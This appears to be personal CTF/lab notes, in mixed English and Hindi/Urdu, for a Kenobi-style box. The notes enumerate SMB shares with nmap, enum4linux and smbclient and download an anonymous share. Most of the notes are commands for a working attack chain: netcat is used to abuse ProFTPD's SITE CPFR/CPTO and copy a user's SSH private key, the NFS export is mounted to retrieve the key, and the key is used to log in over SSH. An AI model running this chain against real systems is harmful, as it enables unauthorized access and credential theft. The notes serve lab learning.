SAMBA && RPCBIND & MOUNTING & SMBCLIENT
enumerating samba for shares
1> nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.201.87.30
2> SMB has two ports, 445 and 139.
3> enum4linux -a 10.201.87.30
4> smbclient -I 10.201.87.30 -L 10.201.87.30 -N
5> smbclient -L //10.201.87.30 -N
6> smbclient -L 10.201.87.30 -N
7> smbclient -L 10.201.87.30 -U username%password --> is username and password is known bhai
taking acess to share
print$ (Disk)
Ye special share hota hai jisme printer drivers store hote hain. Usually read-only for printer installs — files ho sakte hain lekin normal data share jaisa nahi.
anonymous (Disk)
Yeh ek real file share hai aur naam se hi lagta hai ke anonymous access allowed hai (kyunki tu
-Nse connect hua aur ye dikha). Matlab tu bina password ke is share ko access kar sakta/kar sakti hai. Ye sabse important hai — isi se files nikaal sakte ho.
IPC$ (IPC)
IPC$ file share nahi hai jaise normal folder — ye Named Pipes / inter-process communication ke liye hota hai (authentication, service communication). Generally browse karne ke liye useful nahi hota, par enumeration tools isse info lete hain.
smbclient //host/share | \\host\share
1> smbclient //10.201.87.30/anonymous -N
2> smbclient //10.201.87.30/anonymous -N -c 'ls'
You can recursively download the SMB share too. Submit the username and password as nothing.
smbget -R smb://10.201.87.30/anonymous
RPCBIND PORT 111
1>
2> showmount -e 10.201.87.30 --> mount ke liye directories dhikenge
proftpad
1> nc ipadress 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa --> pastes the id_rsa to /var/tmp in the server
2> for mounting the remote server into the private , mkdir /mnt/kenobiNFS
mount 10.201.63.169:/var /mnt/kenobiNFS
ls -la /mnt/ kenobiNFS
sudo chmod 600 id_rsa .
ssh -i id_rsa kenobi@10.201.63.169
Last updated
Was this helpful?